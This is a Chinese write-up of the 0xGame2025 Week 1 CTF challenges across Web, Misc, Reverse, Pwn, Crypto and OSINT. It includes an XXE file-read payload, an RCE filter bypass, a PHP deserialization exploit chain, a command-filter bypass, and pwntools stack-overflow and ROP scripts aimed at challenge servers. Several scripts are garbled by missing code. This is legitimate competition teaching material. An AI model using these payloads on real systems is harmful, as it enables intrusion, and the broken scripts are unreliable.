0xGame2025 Week1 wp全(Web+Misc+Reverse+Pwn+Crypto+Osint)

Ne0inhk

24 Mar 2026 — 19 min read

Web

Lemon

时代少年团，我们喜欢你

禁⽤了右键和F12

事实上一直按F12还是可以强制进入或使用快捷键

Ctrl+U

Http的真理，我已解明

通过题目提示改包

POST /?hello=web HTTP/1.1 Host: 80-42e509c2-93bd-4e6a-9963-f2a827a573d0.challenge.ctfplus.cn Content-Length: 9 Cache-Control: max-age=0 Origin: http://80-42e509c2-93bd-4e6a-9963-f2a827a573d0.challenge.ctfplus.cn Content-Type: application/x-www-form-urlencoded Upgrade-Insecure-Requests: 1 User-Agent: Safari Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: www.mihoyo.com Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Cookie: Sean=god Connection: keep-alive Via:clash  http=good

留言板（粉）

登陆界面弱口令直接进入（admin/admin123）

正常输入发现返回XML报错，直接打XSS（经典payload）

//XML 声明 标识这是一个 XML 1.0 文档 <?xml version="1.0"?> //文档类型定义 (DTD) 开始 声明文档类型是 a，并开始内部 DTD 子集定义 <!DOCTYPE a [ //定义了一个名为 xxe 的实体，指示 XML 解析器去读取服务器文件系统上的 /flag 文件  <!ENTITY xxe SYSTEM "file:///flag"> ]> //对前面定义的实体 xxe 的引用。如果 XML 解析器配置不当且允许处理外部实体，它会将 &xxe; 替换为它从 file:///flag 读取到的内容 <msg>&xxe;</msg>

RCE1

MD5过滤了所有命令词system|cat|flag|ls|echo|nl|rev|more|grep|cd|cp|vi|passthru|shell|vim|sort|strings和*

在无法使用简单cat /flag，且过滤了*，不能使用f*，所以：

块system 可以⽤ print替代

cat 可以⽤tac进⾏替代

``表⽰执⾏⾥⾯的命令

f???表⽰匹配f开头的四字⽂件

ls可以⽤l\s绕过

Payload：

http://localhost:80/index.php?rce1[]=1 rce2[]=2&rce3=print(`tac /f???`); //rce3=readfile('/'.'fl'.'ag');

Rubbish_Unser

PHP反序化漏洞

逻辑链：

ZZZ::__destruct → __toString               → Mi::__toString //当作字符串的时候触发               → GI::__call() //通过访问不存在的tks()               → HI3rd::__invoke //通过调⽤函数来触发               → HSR::__get() //通过访问不存在的Elysia               → eval

需要满足以下条件有三种方法

$this -> kiana !== $this -> RaidenMei && md5($this -> kiana) === md5($this -> RaidenMei) && sha1($this -> kiana) === sha1($this -> RaidenMei

要求MD5和SHA1分别相等

a = 1 b = '1' 或者 a = 0 b = 0E1

Error类

$c->a=new Error("a",1);$c->b=new Error("a",2)

最后的throw exception，则是利用了php中的GC回收机制

在PHP中，使用引用计数和回收周期来自动管理内存对象的，当一个变量被设置为NULL，或者没有任何指针指向时，它就会被变成垃圾，被GC机制自动回收掉那么这里的就可以理解为，当一个对象没有被引用时，就会被GC机制回收，在回收的过程中，它会自动触发_destruct方法，而这也就是绕过抛出异常的关键点。

则EXP：

<?php error_reporting(0); class ZZZ {    public $yuzuha;    function __construct($yuzuha)   {        $this -> yuzuha = $yuzuha;   }    function __destruct()   {        echo "破绽，在这里！" . $this -> yuzuha;   } } class HSR {    public $robin="system('env');";    function __get($robin)   {        echo "4";        $castorice = $this -> robin;        eval($castorice);   } } class HI3rd {    public $RaidenMei;    public $kiana;    public $guanxing;    function __invoke()   {        echo "3";        if($this -> kiana !== $this -> RaidenMei && md5($this -> kiana) === md5($this -> RaidenMei) && sha1($this -> kiana) === sha1($this -> RaidenMei))            return $this -> guanxing -> Elysia;   } } class GI {    public $furina;    function __call($arg1, $arg2)   {        echo "2";        $Charlotte = $this -> furina;        return $Charlotte();   } } class Mi {    public $game;    function __toString()   {        echo "1";        $game1 = @$this -> game -> tks();        return $game1;   } } $a=new ZZZ(1); $a-> yuzuha=new Mi(); $a-> yuzuha->game=new GI(); $a-> yuzuha->game->furina=new HI3rd(); $a-> yuzuha->game->furina->kiana=new Exception("",1);$a-> yuzuha->game->furina->RaidenMei=new Exception("",2); $a-> yuzuha->game->furina->guanxing=new HSR(); echo    urlencode(serialize($a)); ?>

O%3A3%3A%22ZZZ%22%3A1%3A%7Bs%3A6%3A%22yuzuha%22%3BO%3A2%3A%22Mi%22%3A1%3A%7Bs%3A4%3A%22game%22%3BO%3A2%3A%22GI%22%3A1%3A%7Bs%3A6%3A%22furina%22%3BO%3A5%3A%22HI3rd%22%3A3%3A%7Bs%3A9%3A%22RaidenMei%22%3BO%3A9%3A%22Exception%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A0%3A%22%22%3Bs%3A17%3A%22%00Exception%00string%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22%00%2A%00code%22%3Bi%3A2%3Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A35%3A%22C%3A%5CUsers%5CWenYifan%5CDownloads%5C123.php%22%3Bs%3A7%3A%22%00%2A%00line%22%3Bi%3A66%3Bs%3A16%3A%22%00Exception%00trace%22%3Ba%3A0%3A%7B%7Ds%3A19%3A%22%00Exception%00previous%22%3BN%3B%7Ds%3A5%3A%22kiana%22%3BO%3A9%3A%22Exception%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A0%3A%22%22%3Bs%3A17%3A%22%00Exception%00string%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22%00%2A%00code%22%3Bi%3A1%3Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A35%3A%22C%3A%5CUsers%5CWenYifan%5CDownloads%5C123.php%22%3Bs%3A7%3A%22%00%2A%00line%22%3Bi%3A66%3Bs%3A16%3A%22%00Exception%00trace%22%3Ba%3A0%3A%7B%7Ds%3A19%3A%22%00Exception%00previous%22%3BN%3B%7Ds%3A8%3A%22guanxing%22%3BO%3A3%3A%22HSR%22%3A1%3A%7Bs%3A5%3A%22robin%22%3Bs%3A14%3A%22system%28%27env%27%29%3B%22%3B%7D%7D%7D%7D%7D1234'env'

Lemon_RevEnge

原型链污染

{ "__init__":{"__globals__":{"os":{"path":{"pardir":","}}}}}

留言板_reVenge

/xxxxmleee.php

和留言板（粉）一样，直接上xss，无需绕过

Misc

Base64解码，二次凯撒解码

公众号原稿

隐写zip文件

解压放入vscode，快捷键ctrl+shift+F查找出flag

Zootopia

随波逐流直接秒

签到-0xGame

0xGame{🎉👋🕹️2️⃣0️⃣2️⃣5️⃣0️⃣❎🎮🎯🏟️🥳🎊⚽😄}

Do not enter

~$ sudo losetup -fP do_not_enter.dd ~$ sudo losetup -a /dev/loop0: [2096]:536444 (/home/yolo/Desktop/timu/0xGame_challenge/do_not_enter.dd) ~$ lsblk -f /dev/loop0 NAME FSTYPE FSVER LABEL UUID FSAVAIL FSUSE% MOUNTPOINTS loop0 ├─loop0p1 ext4 1.0 UserShare 5a6be8f0-43f9-4020-a729-510d6d57e95b ├─loop0p2 ext4 1.0 Do_not_enter 643298ec-2a07-4681-9555-addf90de8ae1 ├─loop0p3 ├─loop0p5 ext4 1.0 WebServer f965eed6-3de2-4533-8e06-2c816f9e4574 └─loop0p6 ext4 1.0 SysLogs 650ce632-c57e-41c6-8a3b-c6bf3d4e2193 ~$ sudo mount /dev/loop0p2 /mnt/test ~$ sudo grep -r "0xGame" /mnt/test /mnt/test/syslog:0xGame{WoW_y0u_fouNd_1t?_114514} ~$ sudo umount /mnt/test ~$ sudo losetup -d /dev/loop0 ~$ sudo rmdir /mnt/test

ez_Shell

根据官方wp提示构造flag

0xGame{hacker/home/hacker.mysecret_It_is_funny_right?_You_hacked_me!!!}

ezShell_PLUS

根据题意

welcome@dep-f031579f-3f98-40cc-acc1-c7fa6cdac464-6c66ccb687-ch48r:~$ ls challenge welcome@dep-f031579f-3f98-40cc-acc1-c7fa6cdac464-6c66ccb687-ch48r:~$ cd challenge welcome@dep-f031579f-3f98-40cc-acc1-c7fa6cdac464-6c66ccb687-ch48r:~/challenge$ ls decrypt.sh files hash_value welcome@dep-f031579f-3f98-40cc-acc1-c7fa6cdac464-6c66ccb687-ch48r:~/challenge$ cat hash_value 9e4bba0f1d59dbb430078a54ad9eda3c2d7f1b3cab323cf2041e61e897fd0840 welcome@dep-f031579f-3f98-40cc-acc1-c7fa6cdac464-6c66ccb687-ch48r:~/challenge$ cd files welcome@dep-f031579f-3f98-40cc-acc1-c7fa6cdac464-6c66ccb687-ch48r:~/challenge/files$ ls 0176a68189f94db9.dat 1b1200177c4ea9ec.dat 3d5834afac4606f8.dat 62c7cb17b04786b4.dat 803de441283368df.dat 9022633201d0114c.dat aafd7b2c75a50f11.dat d44ff49c0c86703c.dat ee9ced0b6f6b601d.dat 04c3188938ce2601.dat 1e799ec864a9c6e8.dat 3f978683d98d9350.dat 668573506f4591d4.dat 85b1fa9c8810f81e.dat 9045070d63b1ba82.dat ad4bb9102e1bcf47.dat d6cda464b6cece86.dat eedeb3f6f9e41d78.dat 057be4fe1cde30fb.dat 262e51b5771342ac.dat 458faeff862cbe68.dat 6b3c4f3c74f08c18.dat 85b4215888550919.dat 9741a9dae1a5ae3d.dat b0e2825f0d65ea5b.dat d82e5ae891779147.dat f9a0df0bab59793e.dat 07407798665d1f75.dat 279ab0db97e10219.dat 4611c3941b32f7f9.dat 709db3059e3957bb.dat 879c2af2398be243.dat 9bae761c07b2f671.dat b549a5b2d496b7e9.dat da7dc3e6bc6bdf3a.dat faadc669b558b605.dat 09fb369625e59728.dat 2ce24055b592b40b.dat 4c6310dd8b15852d.dat 74f12f08836bddd5.dat 880eeffa15558f6c.dat a308e1b416229011.dat be7ff44b59fdb173.dat db17491446902782.dat fb39997214835a7c.dat 0a1c60e654502adb.dat 319c238f551c0dfa.dat 51d2ef1486f5e278.dat 757a52dead5306b5.dat 889aef159d41403e.dat a3565a321a9b54e9.dat beb0ea80f30ac182.dat e0a674e68af70dd8.dat 125292c4df20c497.dat 35c96670121d28a1.dat 526d488bbc080a95.dat 77c8000841d4709e.dat 88a5e03e8be21985.dat a35f7710f08b577b.dat c1896247fc411b32.dat e3e4bc24de66fedf.dat 1472f603fbd9e689.dat 38f77c1e377c822e.dat 564f0f39db60209d.dat 7a82295f2922591d.dat 8c8f0bc6d9b8cc07.dat a57d466ea7c358e5.dat c40b22e73b945e19.dat e52a988f458f55c1.dat 15ed0896b3b7610a.dat 39fbea9c21f57df3.dat 594561a3113217d4.dat 7aec8e09908ea80b.dat 8cdb747a1d7bafee.dat a596002113e86ca4.dat c591f08d6e11159b.dat e5ef377c00bddb9b.dat 17e3120d99e55f5a.dat 3a67d6763b2c1398.dat 5e30fc40249a2efe.dat 7e7494a5a7856418.dat 8dc3240d91849730.dat a68a7c2e939e17ef.dat c983be90e4983006.dat e8b9aa1bffec36ca.dat 18880db088f658e0.dat 3aca851bbc1367b6.dat 62130ca65ad50057.dat 7f6932380e8e3cf4.dat 8e9a101a7d71cf77.dat a9c1939a14255c00.dat d044fbebf0550237.dat eb847ead7d8db6b4.dat 19c5a608ac5d416b.dat 3cafcc334cfcfbb1.dat 629ae4accfba22ec.dat 7fc6a8253857c088.dat 8efbc58fc7baf4be.dat aa60db955ef88d3f.dat d3a3c9b6f96c147f.dat ed6700741d7010fe.dat welcome@dep-f031579f-3f98-40cc-acc1-c7fa6cdac464-6c66ccb687-ch48r:~/challenge/files$ sha256sum *.dat | grep 9e4bba0f1d59dbb430078a54ad9eda3c2d7f1b3cab323cf2041e61e897fd0840 9e4bba0f1d59dbb430078a54ad9eda3c2d7f1b3cab323cf2041e61e897fd0840 f9a0df0bab59793e.dat welcome@dep-f031579f-3f98-40cc-acc1-c7fa6cdac464-6c66ccb687-ch48r:~/challenge/files$ ./decrypt.sh files/f9a0df0bab59793e.dat -bash: ./decrypt.sh: No such file or directory welcome@dep-f031579f-3f98-40cc-acc1-c7fa6cdac464-6c66ccb687-ch48r:~/challenge/files$ cd ../ welcome@dep-f031579f-3f98-40cc-acc1-c7fa6cdac464-6c66ccb687-ch48r:~/challenge$ ./decrypt.sh files/f9a0df0bab59793e.dat 0xGame{Welc0me_to_H@ckers_w0r1d}

Reverse

Signln

方法一

打开即可看见

方法二

右键搜索匹配特征，输入0xGame

Signln2

运行拿到提示

EasyXor

DIE打开查看文件类型

得知是ELF64直接放如IDA

双击str（）函数，或者直接丢给ai分析

ida9.2.7右键可以直接dump，因为版本低，直接使用官方wp了

enc=[0x42,0x1A,0x39,0x17,0x1D,0x9,0x51,0x55,0x2C,0x5F,0x63,0xC,0xD,0x16,0x62,0x27,0x55,0x64,0x55,0x26,0x6D,0x6A,0x18,0x34,0x88,0x65,0x6E,0x1C,0x21,0x6E,0x3D,0x23, 0x6A,0x25,0x6B,0x63,0x68,0x7E,0x77,0x75,0x9A,0x7D,0x39,0x43] key = 'raputa0xGame2025' for i in range(len(enc)):   print(chr((enc[i]-i)^ord(key[i % len(key)])),end='')

BaseUpx

用DIE查看发现标准的UPX壳

使用upx脱壳

IDA打开查看puts函数

解密得到flag

DyDebug

在Pity处断点运行，随机输入即可拿到flag

ZZZ

考求z3求解

用z3复现等式

pip install z3-solver

from z3 import * import hashlib sha256='4aba519d4666f5421488afaaf89efdcbe48e7a53f814ce5c1d82b46b55032651' s=Solver() x1=BitVec('x1',32) x2=BitVec('x2',32) x3=BitVec('x3',32) x4=BitVec('x4',32) s.add(3 * x2 + 5 * x1 + 7 * x4 + 2 * x3 == -1445932505) s.add(2 * (2 * (2 * x2 + x3) + x1) + x4 == -672666814) s.add(7 * x2 + 3 * x1 + 5 * x4 + 4 * x3 == 958464147) s.add(((x1 ^ x2) << 6) + ((x3 >> 6) ^ 0x4514) == 123074281) while s.check() == sat: model=s.model() x1_val=model[x1].as_long() x2_val=model[x2].as_long() x3_val=model[x3].as_long() x4_val=model[x4].as_long() flag=f"0xGame{{{x1_val:08x}{x2_val:08x}{x3_val:08x}{x4_val:08x}}}" if hashlib.sha256(flag.encode()).hexdigest()==sha256:#验证是否为正确flag print(flag) exception=Or(x1!=x1_val,x2!=x2_val,x3!=x3_val,x4!=x4_val)#排除同一解 s.add(exception)

Pwn

命令执行🤔

在正常命令中加⼊⽆关紧要的分隔符,如:ca\t flag;c'a'r flag

wenyifan@wenyifan-VMware-Virtual-Platform:~/Desktop$ nc nc1.ctfplus.cn 26950 Please input your command,no cat no sh! ca\t flag       0xGame{y0u_c4n_4ls0_3x3cu73_c0mm4nd_w17h0u7_5h_4nd_c47}

test_your_nc

stack overflow

很简单的栈溢出

from pwn import * w=remote("nc1.ctfplus.cn",20513) #io=process('./pwn') payload=b'a'*0x38+p64(0x4011F7) w.send(payload) w.interactive()

简单数学题

from pwn import * context.log_level='debug' #io=process('./pwn') io=remote("nc1.ctfplus.cn",16627) io.recvuntil(b"Kore wa shiren da!\n") for i in range(1000):   t=io.recvuntil(b"?")[:-3]   if b"x" in t:       t=t.decode()       t = t.replace("x", "*", 1)       t=t.encode()   num=eval(t)   io.sendline(str(num).encode())   io.recvline()   io.recvline() io.interactive()

ROP1

from pwn import * #io=process('./pwn') io=remote("nc1.ctfplus.cn",26572) system=p64(0x401195) sh=p64(0x000000000040201e) rdi=p64(0x000000000040117e) payload=b'a'*0x28+rdi+sh+system io.send(payload) io.interactive()

ROP2

#io=process('./pwn') io=remote("nc1.ctfplus.cn",49374) payload=b'a'*0x38+p64(0x40119E)+p64(0x401200+2)+p64(0x40122B) #gdb.attach(io) io.sendline(payload) io.interactive()

Crypto

2FA

https://cli.im/deqr/other

oathtool --totp -b FZUA6MCDB6YHVZVZCXK4C47ERRG363MR

CyberChef (左侧): 它的目的是进行通用的数据编码/解码、加密/解密等操作。您使用的是 "From Base32" 模块，它的功能就是将 Base32 字符串解码回原始的字节数据。

oathtool --totp -b (右侧): 它的目的是生成一个TOTP（Time-based One-Time Password）。-b 选项告诉它输入的参数（LLEKTHRI4AKSWAMG4EYGFEQT4T4U5D7P）是一个 Base32 编码的密钥，oathtool 会先将这个 Base32 密钥解码成原始字节，然后用这些字节作为种子（seed）和当前时间戳来计算 TOTP 密码，最终输出一个 6 位或 8 位的数字。

芸翎

import string import hashlib from pwn import * from Crypto.Util.number import * import itertools import re def solve_pow(prefix_end, target_hash): """ 爆破 Proof of Work 的 4 字节前缀 """ alphabet = string.ascii_letters + string.digits for x in itertools.product(alphabet, repeat=4):.join(x) s = x_str + prefix_end if hashlib.sha256(s.encode()).hexdigest() == target_hash: return x_str return None def decrypt_rsa_prime_n(n, e, c_hex): """ 当 n 是素数时的 RSA 解密 """ # 将 hex 密文转为整数（小端序） c_bytes = bytes.fromhex(c_hex) c_int = int.from_bytes(c_bytes, 'little') # phi(n) = n - 1 phi = n - 1 # 检查 gcd(e, phi) g = GCD(e, phi) print(f"[*] gcd(e, phi) = {g}") if g != 1: print("[!] e and phi are not coprime, cannot decrypt directly") return None # 计算私钥 d d = pow(e, -1, phi) # 解密 m = pow(c_int, d, n) return m def extract_flag(m_bytes): """ 从解密后的字节中提取 flag """ # 方法1：尝试 UTF-8 解码 try: flag_str = m_bytes.decode('utf-8') if '}' in flag_str: end_index = flag_str.index('}') + 1 return flag_str[:end_index] return flag_str except: pass # 方法2：查找 flag 风格字符串 if b'flag' in m_bytes or b'0xGame' in m_bytes or b'CTF' in m_bytes: flag_bytes = b'' for byte in m_bytes: if 32 <= byte <= 126: flag_bytes += bytes([byte]) else: break return flag_bytes.decode('ascii', errors='ignore') # 方法3：返回原始预览 return m_bytes[:100] def main(): try: print("[*] Connecting to server...") r = remote('nc1.ctfplus.cn', 14612) # --- PoW --- line = r.recvline().decode().strip() print(f"[*] Received: {line}") match = re.match(r'\[\+\] sha256\(XXXX\+([a-zA-Z0-9]+)\) == ([0-9a-f]+)', line) if not match: print("[!] Failed to parse PoW challenge") return suffix = match.group(1) target_hash = match.group(2) print(f"[*] Solving POW: suffix={suffix}, target_hash={target_hash}") xxxx = solve_pow(suffix, target_hash) if xxxx is None: print("[!] POW failed") return print(f"[+] POW solved: {xxxx}") r.sendlineafter(b'[-] Give me XXXX:', xxxx.encode()) # --- 接收 RSA 参数 --- r.recvuntil(b'[+] n = ') n = int(r.recvline().strip()) r.recvuntil(b'[+] e = ') e = int(r.recvline().strip()) r.recvuntil(b'[+] c = ') c_hex = r.recvline().strip().decode() print(f"[*] n bits = {n.bit_length()}") print(f"[*] e = {e}") print(f"[*] c_hex length = {len(c_hex)}") # --- 解密 --- m = decrypt_rsa_prime_n(n, e, c_hex) if m is None: return m_bytes = long_to_bytes(m) print(f"[*] Decrypted message length: {len(m_bytes)} bytes") # --- 提取 flag --- flag = extract_flag(m_bytes) print(f"\n[+] FLAG: {flag}\n") # 调试用：前后 50 字节 print(f"[*] First 50 bytes: {m_bytes[:50]}") print(f"[*] Last 50 bytes: {m_bytes[-50:]}") except Exception as e: print(f"[!] Error: {e}") finally: try: r.close() except: pass if __name__ == '__main__': main()

Diffie-Hellman

#!/usr/bin/env python3 # exploit_dh_flag.py # Usage: python3 exploit_dh_flag.py import socket import re from hashlib import sha256 from Crypto.Cipher import AES from Crypto.Util.Padding import unpad from Crypto.Util.number import long_to_bytes HOST = "nc1.ctfplus.cn" PORT = 49871 def recv_all_until(sock, marker, timeout=5): sock.settimeout(timeout) data = b"" while True: try: chunk = sock.recv(4096) if not chunk: break data += chunk if marker in data: break except socket.timeout: break return data def main(): with socket.create_connection((HOST, PORT), timeout=10) as s: # read initial banner until prompt for Bob's Public Key data = recv_all_until(s, b"Bob's Public Key:") text = data.decode(errors='ignore') print("[+] Server banner:") print(text) # send B = 1 s.sendall(b"1\n") print("[+] Sent Bob's public key = 1") # receive remaining output (encrypted flag) more = recv_all_until(s, b"\n", timeout=2) data2 = data + more text2 = data2.decode(errors='ignore') # try to find the hex after "Encrypted Flag:" m = re.search(r"Encrypted Flag:\s*([0-9a-fA-F]+)", text2) if not m: # maybe server closed and printed later; try reading more try: extra = s.recv(8192) text2 += extra.decode(errors='ignore') m = re.search(r"Encrypted Flag:\s*([0-9a-fA-F]+)", text2) except: pass if not m: print("[-] Couldn't find 'Encrypted Flag' in server response. Full response:") print(text2) return hex_cipher = m.group(1) print("[+] Encrypted Flag (hex):", hex_cipher) ct = bytes.fromhex(hex_cipher) # reproduce key: s = 1 -> long_to_bytes(1) key = sha256(long_to_bytes(1)).digest() cipher = AES.new(key, AES.MODE_ECB) try: pt = unpad(cipher.decrypt(ct), 16) except ValueError as e: print("[-] Unpad/Decrypt error:", e) # still try without unpad pt = cipher.decrypt(ct) print("\n[+] Decrypted flag (raw bytes):", pt) try: print("[+] Flag (utf-8):", pt.decode()) except: print("[+] Flag (repr):", repr(pt)) if __name__ == "__main__": main()

ez_RSA

from Crypto.Util.number import * from secret import flag p, q = [getPrime(256) for _ in range(2)] n = p * q e = 65537 m = bytes_to_long(flag) c = pow(m, e, n) print(f"n = {n}") print(f"c = {c}") # n = 5288062996177288067805240670327919739339874127477405321607402348589147491552053048231920112750216696782518281218048178087877077018108705271341382858124037 # c = 2454797328903978848197140611862882439826920912955785083080835692389929572917351093371626343669582289242212514789420568997224614087740388703381025018563979

分解n得到p和q，计算出d值后，再算出m，最后将m转化为字符串

https://factordb.com/

p=60979507724530093051797511853954365018147917052474373616663462193464369184711 q=86718689499194998339746379891242621495538434539975542252458947218776577824467

解密脚本

# -*- coding: utf-8 -*- from Crypto.Util.number import long_to_bytes, inverse # 已知参数 n = 5288062996177288067805240670327919739339874127477405321607402348589147491552053048231920112750216696782518281218048178087877077018108705271341382858124037 c = 2454797328903978848197140611862882439826920912955785083080835692389929572917351093371626343669582289242212514789420568997224614087740388703381025018563979 p = 60979507724530093051797511853954365018147917052474373616663462193464369184711 q = 86718689499194998339746379891242621495538434539975542252458947218776577824467 e = 65537 # ------------------- RSA 私钥恢复 ------------------- # 验证 n = p * q assert n == p * q, "p * q 不等于给出的 n！" # 计算 φ(n) = (p-1)*(q-1) phi = (p - 1) * (q - 1) # 计算私钥 d = e^{-1} mod φ(n) d = inverse(e, phi) # ------------------- 解密 ------------------- # m = c^d mod n m = pow(c, d, n) # 将整数转回字节 → flag flag = long_to_bytes(m) print("flag =", flag.decode()) # 假设 flag 是可打印的 ASCII 字符串

Vigenere

from string import digits, ascii_letters, punctuation ciphertext = 'WL"mKAaequ{q_aY$oz8`wBqLAF_{cku|eYAczt!pmoqAh+' key = "Welcome-2025-0xGame" alphabet = digits + ascii_letters + punctuation def vigenere_decrypt(cipher, key): key_index = 0 for char in cipher: bias = alphabet.index(key[key_index]) char_index = alphabet.index(char) new_index = (char_index - bias) % len(alphabet) plaintext += alphabet[new_index] key_index = (key_index + 1) % len(key) return plaintext flag = vigenere_decrypt(ciphertext, key) print(flag)

笙莲

#!/usr/bin/env python3 # 最终版：自动解码 + 自动截断随机字节，只输出真实 flag from base64 import b64decode # ======= 把题目输出的四行填在这里（无需加 b''） ======= c0 = "MHhHYW1le7u2063AtLW9MHhHYW1lMjAyNQ==" c1 = "a3accfd6d4dac4e3d2d1beadd1a7bbe143727970746fb5c4bb" c2 = "wqwwwqqaawwwaaqawqwawwwwaaawwwawaqqwwwqaqwwqwaaqwaqqaaawqqqaqaqwaaawwwqaqaaaaqawaqqqwwqqwaqwqwwwawawqqwwqqawqwaqwwawwqwaqqaqwaw" c3 = "5787980659359196741038715872684190805073807486263453249083702093905274294594502252203577660251756609738877887210677202141957646934092054500618364441642896304387589669635034683021946777034215355675802286923927161922717560413551789421376288823912349463080999424773600185557948875343480056576969695671340947861706467351885610345887785319870159654836532664189086047061137903149197973327299859185905186913896041309284477616128" # ===================================================== # ---------- decode part ---------- def decode_awaqaq(s: str) -> bytes: inv = {'a':0, 'w':1, 'q':2} num = 0 for i, ch in enumerate(s): num += inv[ch] * (3 ** i) length = (num.bit_length() + 7) // 8 return num.to_bytes(length, 'big') def integer_kth_root(n: int, k: int) -> int: lo, hi = 1, 1 << ((n.bit_length() // k) + 2) while lo < hi: mid = (lo + hi) // 2 if mid**k <= n: lo = mid + 1 else: hi = mid return lo - 1 # decode each part b0 = b64decode(c0) b1 = bytes.fromhex(c1) b2 = decode_awaqaq(c2) # c3 = (little_int)**7 n = int(c3) x = integer_kth_root(n, 7) seg_len = max(len(b0), len(b1), len(b2)) b3 = x.to_bytes(seg_len, 'little') # combine all bytes all_bytes = b0 + b1 + b2 + b3 # ---------- 自动截断到 '}' ---------- end = all_bytes.find(b"}") if end == -1: raise ValueError("没有找到 '}'，可能数据复制错误") flag = all_bytes[:end+1].decode("gb2312", errors="ignore") # ---------- 输出最终 flag ---------- print(flag)

Vigenere Advanced

# solve_vigenere_adv.py from string import digits, ascii_letters, punctuation, ascii_lowercase import itertools alphabet = digits + ascii_letters + punctuation key = "QAQ(@.@)" ciphertext = "0l0CSoYM<c;amo_P_" # 题目给的输出 n = len(alphabet) prefix = "0xGame{" suffix = "}" def decrypt_char(c, bias): """暴力求原字符，只返回可能的明文字符列表""" target_index = alphabet.index(c) candidates = [] for x in range(n): if ((x + bias) * x) % n == target_index: candidates.append(alphabet[x]) return candidates # 构造每个位置的候选字符（并基于 flag 格式过滤） cand_lists = [] for i, c in enumerate(ciphertext): bias = alphabet.index(key[i % len(key)]) cands = decrypt_char(c, bias) if i < len(prefix): cands = [ch for ch in cands if ch == prefix[i]] elif i == len(ciphertext) - 1: cands = [ch for ch in cands if ch == suffix] else: cands = [ch for ch in cands if ch in ascii_lowercase] if not cands: raise ValueError(f"No candidates at position {i} for cipher char {c!r}") cand_lists.append(cands) # 生成所有组合并验证（双重保险：确保加密回得到原密文） def encrypt(plaintext, key): key_index = 0 for ch in plaintext: bias = alphabet.index(key[key_index]) char_index = alphabet.index(ch) new_index = ((char_index + bias) * char_index) % n ct += alphabet[new_index] key_index = (key_index + 1) % len(key) return ct candidates = [] for combo in itertools.product(*cand_lists):.join(combo) if encrypt(pt, key) == ciphertext: candidates.append(pt) # 简单按“可读性”排序：优先包含常见英文单词 'excellent' def score_flag(s): body = s[len(prefix):-1] score = 0 if "excellent" in body: score += 10 # 更多启发可在此添加 return score candidates = sorted(candidates, key=lambda s: -score_flag(s)) print("找到的候选 flag（按可能性排序）：") for i, c in enumerate(candidates, 1): print(f"{i}. {c}") # 如果你想直接取最可能的： if candidates: print("\n最可能的 flag：", candidates[0]) else: print("未找到符合条件的 flag。")

Osint

猜猜background

0xGame{大室山_32.1191_118.9265}

Web